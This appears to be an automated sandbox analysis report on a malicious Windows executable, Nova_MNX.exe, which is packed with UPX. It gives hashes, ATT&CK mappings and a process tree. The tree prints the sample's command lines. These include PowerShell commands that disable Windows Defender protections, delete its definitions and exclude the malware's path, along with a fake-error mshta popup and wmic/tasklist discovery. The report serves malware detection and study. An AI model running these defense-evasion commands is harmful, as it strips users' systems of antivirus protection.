2fd1cca60fd5d10a3d0bc943e24d023f0cc186a70a06e7b9daa797e65eb44868

Analysis

max time kernel
8s
max time network
137s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
10/01/2024, 17:22

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Nova_MNX.exe
Size

7.3MB
MD5

5a9d470cc30e2f75b4feec8230c903f5
SHA1

f2233fc2ab53534611f87e4d1623b9f7ea6ebd96
SHA256

2fd1cca60fd5d10a3d0bc943e24d023f0cc186a70a06e7b9daa797e65eb44868
SHA512

1f468d99a7ab15b8f46eb9326bdd08d3f669c48888286775386abe0f019bc37ac8580c552fca17839e6c7a23662b26ca76871562a7740a9023607d578a9a0b0a
SSDEEP

196608:nPYS6mOshoKMuIkhVastRL5Di3u41D7dJg:PYSNOshouIkPftRL54VRDg

Score

10^/10

evasion upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
224	MpCmdRun.exe

Loads dropped DLL 17 IoCs

pid	Process
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe
4124	Nova_MNX.exe

UPX packed file 38 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001ab9c-25.dat	upx
behavioral1/memory/4124-29-0x00007FF95A730000-0x00007FF95AD19000-memory.dmp	upx
behavioral1/files/0x000600000001ab9c-26.dat	upx
behavioral1/memory/4124-58-0x00007FF95DD30000-0x00007FF95DD5D000-memory.dmp	upx
behavioral1/memory/4124-62-0x00007FF95DD00000-0x00007FF95DD23000-memory.dmp	upx
behavioral1/memory/4124-64-0x00007FF95B190000-0x00007FF95B307000-memory.dmp	upx
behavioral1/memory/4124-71-0x00007FF95DCC0000-0x00007FF95DCF3000-memory.dmp	upx
behavioral1/memory/4124-72-0x00007FF95DBF0000-0x00007FF95DCBD000-memory.dmp	upx
behavioral1/memory/4124-75-0x00007FF95A730000-0x00007FF95AD19000-memory.dmp	upx
behavioral1/memory/4124-99-0x00007FF95DD00000-0x00007FF95DD23000-memory.dmp	upx
behavioral1/memory/4124-84-0x00007FF95AFA0000-0x00007FF95B0BC000-memory.dmp	upx
behavioral1/memory/4124-82-0x00007FF95DDB0000-0x00007FF95DDBD000-memory.dmp	upx
behavioral1/memory/4124-81-0x00007FF95DD60000-0x00007FF95DD83000-memory.dmp	upx
behavioral1/memory/4124-79-0x00007FF95DBD0000-0x00007FF95DBE4000-memory.dmp	upx
behavioral1/memory/4124-76-0x00007FF958E90000-0x00007FF9593B0000-memory.dmp	upx
behavioral1/memory/4124-68-0x00007FF95DDC0000-0x00007FF95DDCD000-memory.dmp	upx
behavioral1/memory/4124-67-0x00007FF95EBB0000-0x00007FF95EBC9000-memory.dmp	upx
behavioral1/memory/4124-61-0x00007FF95EE40000-0x00007FF95EE59000-memory.dmp	upx
behavioral1/memory/4124-36-0x00007FF95FBC0000-0x00007FF95FBCF000-memory.dmp	upx
behavioral1/memory/4124-33-0x00007FF95DD60000-0x00007FF95DD83000-memory.dmp	upx
behavioral1/memory/4124-108-0x00007FF95B190000-0x00007FF95B307000-memory.dmp	upx
behavioral1/memory/4124-109-0x00007FF95EBB0000-0x00007FF95EBC9000-memory.dmp	upx
behavioral1/memory/4124-129-0x00007FF95A730000-0x00007FF95AD19000-memory.dmp	upx
behavioral1/memory/4124-132-0x00007FF95FBC0000-0x00007FF95FBCF000-memory.dmp	upx
behavioral1/memory/4124-136-0x00007FF95EE40000-0x00007FF95EE59000-memory.dmp	upx
behavioral1/memory/4124-140-0x00007FF95B190000-0x00007FF95B307000-memory.dmp	upx
behavioral1/memory/4124-144-0x00007FF95DDC0000-0x00007FF95DDCD000-memory.dmp	upx
behavioral1/memory/4124-145-0x00007FF95DCC0000-0x00007FF95DCF3000-memory.dmp	upx
behavioral1/memory/4124-148-0x00007FF95DBF0000-0x00007FF95DCBD000-memory.dmp	upx
behavioral1/memory/4124-152-0x00007FF95DBD0000-0x00007FF95DBE4000-memory.dmp	upx
behavioral1/memory/4124-156-0x00007FF95AFA0000-0x00007FF95B0BC000-memory.dmp	upx
behavioral1/memory/4124-154-0x00007FF95DDB0000-0x00007FF95DDBD000-memory.dmp	upx
behavioral1/memory/4124-150-0x00007FF958E90000-0x00007FF9593B0000-memory.dmp	upx
behavioral1/memory/4124-146-0x00007FF95DCC0000-0x00007FF95DCF3000-memory.dmp	upx
behavioral1/memory/4124-141-0x00007FF95EBB0000-0x00007FF95EBC9000-memory.dmp	upx
behavioral1/memory/4124-138-0x00007FF95DD00000-0x00007FF95DD23000-memory.dmp	upx
behavioral1/memory/4124-134-0x00007FF95DD30000-0x00007FF95DD5D000-memory.dmp	upx
behavioral1/memory/4124-131-0x00007FF95DD60000-0x00007FF95DD83000-memory.dmp	upx

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
4332	tasklist.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4352	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4332	tasklist.exe
Token: SeDebugPrivilege	4352	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 4124	2368	Nova_MNX.exe	72
PID 2368 wrote to memory of 4124	2368	Nova_MNX.exe	72
PID 4124 wrote to memory of 3956	4124	Nova_MNX.exe	88
PID 4124 wrote to memory of 3956	4124	Nova_MNX.exe	88
PID 4124 wrote to memory of 3716	4124	Nova_MNX.exe	87
PID 4124 wrote to memory of 3716	4124	Nova_MNX.exe	87
PID 4124 wrote to memory of 3064	4124	Nova_MNX.exe	86
PID 4124 wrote to memory of 3064	4124	Nova_MNX.exe	86
PID 4124 wrote to memory of 2876	4124	Nova_MNX.exe	82
PID 4124 wrote to memory of 2876	4124	Nova_MNX.exe	82
PID 3716 wrote to memory of 4352	3716	cmd.exe	81
PID 3716 wrote to memory of 4352	3716	cmd.exe	81
PID 3956 wrote to memory of 4304	3956	cmd.exe	74
PID 3956 wrote to memory of 4304	3956	cmd.exe	74
PID 2876 wrote to memory of 4332	2876	cmd.exe	78
PID 2876 wrote to memory of 4332	2876	cmd.exe	78
PID 3064 wrote to memory of 764	3064	cmd.exe	77
PID 3064 wrote to memory of 764	3064	cmd.exe	77
PID 4124 wrote to memory of 2928	4124	Nova_MNX.exe	76
PID 4124 wrote to memory of 2928	4124	Nova_MNX.exe	76

C:\Users\Admin\AppData\Local\Temp\Nova_MNX.exe
"C:\Users\Admin\AppData\Local\Temp\Nova_MNX.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Users\Admin\AppData\Local\Temp\Nova_MNX.exe
  "C:\Users\Admin\AppData\Local\Temp\Nova_MNX.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You need the latest web framework', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3716
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nova_MNX.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nova_MNX.exe'
1⤵
PID:4304

C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You need the latest web framework', 0, 'Error', 0+16);close()"
1⤵
PID:764

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Process Discovery

T1057

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI23682\python311.dll

Filesize
92KB

MD5
cc9954f4ade28f2fdad41b41679d80c5

SHA1
ef620ffc70cb0bb8c5074ebb86ffe0126b7c4dbe

SHA256
4776408ab5a33a5666e7e47f1ae4cb8b09d5850a4baf15adce0e3b594f5a5c94

SHA512
3265023a3f17e6780c61d89dea512eee13c328c1478d8dd8e8fe129673d30aaee4f650cfd483b8df3efa6c73c169fc12afef7a5add0850e2cf0ab5643272682d

Download Submit
memory/4124-152-0x00007FF95DBD0000-0x00007FF95DBE4000-memory.dmp

Filesize
80KB

Download
memory/4124-146-0x00007FF95DCC0000-0x00007FF95DCF3000-memory.dmp

Filesize
204KB

Download
memory/4124-62-0x00007FF95DD00000-0x00007FF95DD23000-memory.dmp

Filesize
140KB

Download
memory/4124-64-0x00007FF95B190000-0x00007FF95B307000-memory.dmp

Filesize
1.5MB

Download
memory/4124-71-0x00007FF95DCC0000-0x00007FF95DCF3000-memory.dmp

Filesize
204KB

Download
memory/4124-72-0x00007FF95DBF0000-0x00007FF95DCBD000-memory.dmp

Filesize
820KB

Download
memory/4124-75-0x00007FF95A730000-0x00007FF95AD19000-memory.dmp

Filesize
5.9MB

Download
memory/4124-77-0x0000029EEECC0000-0x0000029EEF1E0000-memory.dmp

Filesize
5.1MB

Download
memory/4124-131-0x00007FF95DD60000-0x00007FF95DD83000-memory.dmp

Filesize
140KB

Download
memory/4124-134-0x00007FF95DD30000-0x00007FF95DD5D000-memory.dmp

Filesize
180KB

Download
memory/4124-138-0x00007FF95DD00000-0x00007FF95DD23000-memory.dmp

Filesize
140KB

Download
memory/4124-141-0x00007FF95EBB0000-0x00007FF95EBC9000-memory.dmp

Filesize
100KB

Download
memory/4124-108-0x00007FF95B190000-0x00007FF95B307000-memory.dmp

Filesize
1.5MB

Download
memory/4124-99-0x00007FF95DD00000-0x00007FF95DD23000-memory.dmp

Filesize
140KB

Download
memory/4124-33-0x00007FF95DD60000-0x00007FF95DD83000-memory.dmp

Filesize
140KB

Download
memory/4124-150-0x00007FF958E90000-0x00007FF9593B0000-memory.dmp

Filesize
5.1MB

Download
memory/4124-84-0x00007FF95AFA0000-0x00007FF95B0BC000-memory.dmp

Filesize
1.1MB

Download
memory/4124-82-0x00007FF95DDB0000-0x00007FF95DDBD000-memory.dmp

Filesize
52KB

Download
memory/4124-81-0x00007FF95DD60000-0x00007FF95DD83000-memory.dmp

Filesize
140KB

Download
memory/4124-79-0x00007FF95DBD0000-0x00007FF95DBE4000-memory.dmp

Filesize
80KB

Download
memory/4124-76-0x00007FF958E90000-0x00007FF9593B0000-memory.dmp

Filesize
5.1MB

Download
memory/4124-68-0x00007FF95DDC0000-0x00007FF95DDCD000-memory.dmp

Filesize
52KB

Download
memory/4124-67-0x00007FF95EBB0000-0x00007FF95EBC9000-memory.dmp

Filesize
100KB

Download
memory/4124-61-0x00007FF95EE40000-0x00007FF95EE59000-memory.dmp

Filesize
100KB

Download
memory/4124-58-0x00007FF95DD30000-0x00007FF95DD5D000-memory.dmp

Filesize
180KB

Download
memory/4124-36-0x00007FF95FBC0000-0x00007FF95FBCF000-memory.dmp

Filesize
60KB

Download
memory/4124-154-0x00007FF95DDB0000-0x00007FF95DDBD000-memory.dmp

Filesize
52KB

Download
memory/4124-109-0x00007FF95EBB0000-0x00007FF95EBC9000-memory.dmp

Filesize
100KB

Download
memory/4124-158-0x0000029EEECC0000-0x0000029EEF1E0000-memory.dmp

Filesize
5.1MB

Download
memory/4124-129-0x00007FF95A730000-0x00007FF95AD19000-memory.dmp

Filesize
5.9MB

Download
memory/4124-132-0x00007FF95FBC0000-0x00007FF95FBCF000-memory.dmp

Filesize
60KB

Download
memory/4124-136-0x00007FF95EE40000-0x00007FF95EE59000-memory.dmp

Filesize
100KB

Download
memory/4124-140-0x00007FF95B190000-0x00007FF95B307000-memory.dmp

Filesize
1.5MB

Download
memory/4124-144-0x00007FF95DDC0000-0x00007FF95DDCD000-memory.dmp

Filesize
52KB

Download
memory/4124-145-0x00007FF95DCC0000-0x00007FF95DCF3000-memory.dmp

Filesize
204KB

Download
memory/4124-156-0x00007FF95AFA0000-0x00007FF95B0BC000-memory.dmp

Filesize
1.1MB

Download
memory/4124-148-0x00007FF95DBF0000-0x00007FF95DCBD000-memory.dmp

Filesize
820KB

Download
memory/4124-29-0x00007FF95A730000-0x00007FF95AD19000-memory.dmp

Filesize
5.9MB

Download
memory/4304-101-0x000002E9ADF50000-0x000002E9ADF60000-memory.dmp

Filesize
64KB

Download
memory/4304-227-0x00007FF9584A0000-0x00007FF958E8C000-memory.dmp

Filesize
9.9MB

Download
memory/4304-161-0x000002E9ADF50000-0x000002E9ADF60000-memory.dmp

Filesize
64KB

Download
memory/4304-219-0x000002E9ADF50000-0x000002E9ADF60000-memory.dmp

Filesize
64KB

Download
memory/4304-95-0x000002E9ADF50000-0x000002E9ADF60000-memory.dmp

Filesize
64KB

Download
memory/4304-97-0x00007FF9584A0000-0x00007FF958E8C000-memory.dmp

Filesize
9.9MB

Download
memory/4304-111-0x000002E9C6670000-0x000002E9C66E6000-memory.dmp

Filesize
472KB

Download
memory/4352-91-0x00007FF9584A0000-0x00007FF958E8C000-memory.dmp

Filesize
9.9MB

Download
memory/4352-93-0x000001E4C8310000-0x000001E4C8320000-memory.dmp

Filesize
64KB

Download
memory/4352-147-0x000001E4C8310000-0x000001E4C8320000-memory.dmp

Filesize
64KB

Download
memory/4352-218-0x000001E4C8310000-0x000001E4C8320000-memory.dmp

Filesize
64KB

Download
memory/4352-228-0x00007FF9584A0000-0x00007FF958E8C000-memory.dmp

Filesize
9.9MB

Download
memory/4352-98-0x000001E4E09E0000-0x000001E4E0A02000-memory.dmp

Filesize
136KB

Download
memory/4352-100-0x000001E4C8310000-0x000001E4C8320000-memory.dmp

Filesize
64KB

Download